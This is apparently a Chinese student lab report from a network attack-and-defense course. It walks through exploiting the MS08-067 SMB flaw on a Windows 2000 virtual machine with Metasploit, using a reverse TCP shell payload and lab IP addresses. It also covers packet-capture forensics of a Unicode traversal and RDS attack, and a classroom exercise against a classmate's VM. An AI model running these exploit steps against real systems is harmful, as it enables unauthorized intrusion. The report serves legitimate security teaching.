20231913 2023-2024-2 《网络攻防实践》实践六报告

本文详细描述了一次关于Metasploit工具在Windows系统攻防中的实践过程,包括漏洞利用、取证分析和团队对抗环节。作者通过实例展示了如何进行NT系统破解攻击,以及在实践中遇到的问题和解决方法,强调了Windows系统安全的重要性。
摘要由CSDN通过智能技术生成

20231913 2023-2024-2 《网络攻防实践》实践六报告

1.实践过程

1.1 实践Metasploit windows attacker

输入msfconsole
在这里插入图片描述
输入search ms08_067 搜索一下ms08_067漏洞
在这里插入图片描述

输入 use exploit/windows/smb/ms08_067_netapi和show payloads,可以知道是可用于渗透攻击的
在这里插入图片描述
在这里插入图片描述

输入 set payload generic/shell_reverse_tcp 设置攻击的载荷为tcp的反向连接
输入 show options,展示渗透攻击需要设置的参数
在这里插入图片描述

输入 show targets 展示可渗透攻击的靶机的操作系统及版本
在这里插入图片描述
输入指令:set LHOST 192.168.200.4 设置渗透攻击的主机是kali虚拟机
输入指令:set RHOST 192.168.200.124 设置渗透攻击的靶机是Win2k虚拟机
在这里插入图片描述
输入exploit开始渗透攻击
在这里插入图片描述

1.2 取证分析实践:解码一次成功的NT系统破解攻击

用wireshark打开学习通上的.log文件
在这里插入图片描述
找到213.116.251.162和172.16.1.106的数据流
在这里插入图片描述
右键选择追踪流,TCP流
在这里插入图片描述

追踪一个数据流,发现【%C0%AF】为Unicode编码,由此判断攻击者进行了Unicode攻击以打开boot.ini文件,因此存在Unicode漏洞攻击
在这里插入图片描述
继续追踪数据流,发现有shell语句和"ADM!ROX!YOUR!WORLD",判断攻击者通过shell指令对目标进行操作,并且,还利用了RDS漏洞允许任意代码执行的缺陷进行了操作
在这里插入图片描述

1.3 团队对抗实践:windows系统远程渗透攻击和分析

攻击方IP:192.168.236.251(20231913zc)
防守方IP:192.168.236.78(20231914yzy)

先将自己的虚拟机和靶机连到同一环境下试试
关闭kali,将其设置成桥接模式,让其连到自己的手机热点上
在这里插入图片描述
win2k靶机这里也要设置一下自动获取ip地址
在这里插入图片描述

桥接之后win2k的ip地址
在这里插入图片描述
桥接下kali的ip地址
在这里插入图片描述

kali和win2k ping通了
在这里插入图片描述
按照之前渗透攻击的步骤,渗透攻击靶机192.168.236.211
在这里插入图片描述
可以发现成功在靶机c盘里创建文件夹cangdao
在这里插入图片描述
wireshark内也能发现相关的TCP数据流
在这里插入图片描述

接下来开始真实地进行攻击他人电脑的虚拟机
攻击方IP:192.168.236.251(20231913zc)
防守方IP:192.168.236.78(20231914yzy)
和之前一样将ms08_067作为漏洞进行攻击
在靶机192.168.236.78里创建文件夹,并在文件夹里创建txt文件
在这里插入图片描述
可以在yzy的靶机上发现我创建的文件夹20231913zc,以及文件夹里的txt文件
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
wireshark里也能找到相关的TCP数据流
在这里插入图片描述

2.学习中遇到的问题及解决

  • 问题1:团队实践中两个人的攻击机和靶机很难连通
  • 问题1解决方案:攻击机和靶机都设置为桥接模式,并把两台电脑同时连接在同一局域网下,同时设置一下win2k的网络连接为自动获取ip
    在这里插入图片描述

3.实践总结

通过本次实验,进行了Windows操作系统安全攻防实践,动手实践Metasploit windows attacker,对解码一次成功的NT系统破解攻击进行了取证分析实践,最后进行了团队对抗实践,对windows系统远程渗透攻击和分析。通过进行实践,加深了我对于windows系统安全的理解。但同时由于自身能力原因还有部分实践要求可能没有达成,希望在以后的实践中可以做的更好。

参考资料

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值